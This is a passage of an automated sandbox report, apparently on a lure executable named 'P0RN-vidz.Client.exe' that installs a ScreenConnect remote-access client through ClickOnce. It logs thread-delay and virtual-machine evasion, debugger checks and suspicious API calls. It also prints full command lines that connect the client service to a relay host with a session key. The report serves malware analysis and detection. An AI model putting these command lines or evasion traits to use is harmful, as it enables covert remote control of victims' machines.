                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -593828s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -593719s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -593594s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -593484s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -593375s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -593265s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -593156s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -593046s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -592937s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -592828s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -592719s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -592609s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 3472Thread sleep time: -592500s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exe TID: 2876Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exe TID: 7748Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe TID: 7792Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe TID: 8012Thread sleep time: -30000s >= -30000s
                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeCode function: 0_2_00374B9B FindFirstFileExA,0_2_00374B9B
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeThread delayed: delay time: 40000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599891Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599642Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599516Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599363Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599125Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598997Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598887Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598625Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598493Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598123Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597884Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597721Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597565Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597328Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\Jump to behavior
                  Source: Amcache.hve.5.drBinary or memory string: VMware
                  Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: svchost.exe, 00000007.00000002.3278405244.000001CCF789F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NXTcpV6VMWare
                  Source: dfsvc.exe, 00000001.00000002.3015186666.0000020C3F1D3000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3018489953.0000020C40D77000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3018182042.0000020C40CEE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3282701373.0000018F2A658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3278245997.000001CCF782B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3278676068.000001CCF78D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: svchost.exe, 00000006.00000002.3279787598.0000018F2502B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: ScreenConnect.ClientService.exe, 0000000C.00000002.3278324089.0000000001490000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlld
                  Source: Amcache.hve.5.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.5.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                  Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.5.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.5.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.5.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.5.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: C:\Windows\System32\svchost.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeCode function: 0_2_00371920 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00371920
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeCode function: 0_2_00371000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00371000
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeCode function: 0_2_003737C7 mov eax, dword ptr fs:[00000030h]0_2_003737C7
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeCode function: 0_2_003769E3 GetProcessHeap,0_2_003769E3
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeCode function: 0_2_00371493 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00371493
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeCode function: 0_2_00371AAD SetUnhandledExceptionFilter,0_2_00371AAD
                  Source: C:\Users\user\Desktop\P0RN-vidz.Client.exeCode function: 0_2_003746C3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_003746C3
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csReference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 6780 -ip 6780Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 884Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=instance-l7g4dh-relay.screenconnect.com&p=443&s=efdde9f7-b36a-4379-90c6-ca6ccaf179c1&k=BgIAAACkAABSU0ExAAgAAAEAAQDVP1a20vKqeqe1KQFemomLm8erwhLpJp1KQnVFAxXxR%2fAz3hz0vYkeQulpCwRe9iWW0dRuBiCd4QvTjxbScJC8nEMvMHnm4MPjY73L4nGpV97oo264zQQyspkhXqNGR2iSOY6rpzvLKPopO9fWOecUGy8yJBQwR0HDB%2bV%2bDADDDeUKlr%2f%2bImJA6eJFZoh3jSThaEua7aIpOZ4Is8GgHX8wrKM81nNiWScf%2b7MB7KKIDRJByiihgKgCgnWSCJjLVCupmRFoab8THk%2fLIjFCP2pmaJw8v7WwUOPs029lZKG3850zwZwC0SO4vLP6yZA1QFVZK7Jr%2fnahgqnKFENgMAm3&r=&i=USTest%20191224%20140" "1"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\z21e79p7.axj\o772b6nd.yza\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\screenconnect.clientservice.exe" "?e=support&y=guest&h=instance-l7g4dh-relay.screenconnect.com&p=443&s=efdde9f7-b36a-4379-90c6-ca6ccaf179c1&k=bgiaaackaabsu0exaagaaaeaaqdvp1a20vkqeqe1kqfemomlm8erwhlpjp1kqnvfaxxxr%2faz3hz0vykequlpcwre9iww0drubicd4qvtjxbscjc8nemvmhnm4mpjy73l4ngpv97oo264zqqyspkhxqngr2isoy6rpzvlkpopo9fwoecugy8yjbqwr0hdb%2bv%2bdadddeuklr%2f%2bimja6ejfzoh3jsthaeua7aipoz4is8gghx8wrkm81nniwscf%2b7mb7kkidrjbyiihgkgcgnwscjjlvcupmrfoab8thk%2flijfcp2pmajw8v7wwuops029lzkg3850zwzwc0so4vlp6yza1qfvzk7jr%2fnahgqnkfengmam3&r=&i=ustest%20191224%20140" "1"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\z21e79p7.axj\o772b6nd.yza\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\screenconnect.clientservice.exe" "?e=support&y=guest&h=instance-l7g4dh-relay.screenconnect.com&p=443&s=efdde9f7-b36a-4379-90c6-ca6ccaf179c1&k=bgiaaackaabsu0exaagaaaeaaqdvp1a20vkqeqe1kqfemomlm8erwhlpjp1kqnvfaxxxr%2faz3hz0vykequlpcwre9iww0drubicd4qvtjxbscjc8nemvmhnm4mpjy73l4ngpv97oo264zqqyspkhxqngr2isoy6rpzvlkpopo9fwoecugy8yjbqwr0hdb%2bv%2bdadddeuklr%2f%2bimja6ejfzoh3jsthaeua7aipoz4is8gghx8wrkm81nniwscf%2b7mb7kkidrjbyiihgkgcgnwscjjlvcupmrfoab8thk%2flijfcp2pmajw8v7wwuops029lzkg3850zwzwc0so4vlp6yza1qfvzk7jr%2fnahgqnkfengmam3&r=&i=ustest%20191224%20140" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe "c:\users\user\appdata\local\apps\2.0\z21e79p7.axj\o772b6nd.yza\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\screenconnect.clientservice.exe" "?e=support&y=guest&h=instance-l7g4dh-relay.screenconnect.com&p=443&s=efdde9f7-b36a-4379-90c6-ca6ccaf179c1&k=bgiaaackaabsu0exaagaaaeaaqdvp1a20vkqeqe1kqfemomlm8erwhlpjp1kqnvfaxxxr%2faz3hz0vykequlpcwre9iww0drubicd4qvtjxbscjc8nemvmhnm4mpjy73l4ngpv97oo264zqqyspkhxqngr2isoy6rpzvlkpopo9fwoecugy8yjbqwr0hdb%2bv%2bdadddeuklr%2f%2bimja6ejfzoh3jsthaeua7aipoz4is8gghx8wrkm81nniwscf%2b7mb7kkidrjbyiihgkgcgnwscjjlvcupmrfoab8thk%2flijfcp2pmajw8v7wwuops029lzkg3850zwzwc0so4vlp6yza1qfvzk7jr%2fnahgqnkfengmam3&r=&i=ustest%20191224%20140" "1"Jump to behavior
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.2508057514.0000000000C52000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.drBinary or memory string: Progman
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000000.2508057514.0000000000C52000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.ClientService.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.WindowsBackstageShell.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.WindowsFileManager.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.WindowsClient.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.WindowsBackstageShell.exe.config VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.WindowsFileManager.exe VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.Client.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.Core.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.dll VolumeInformation
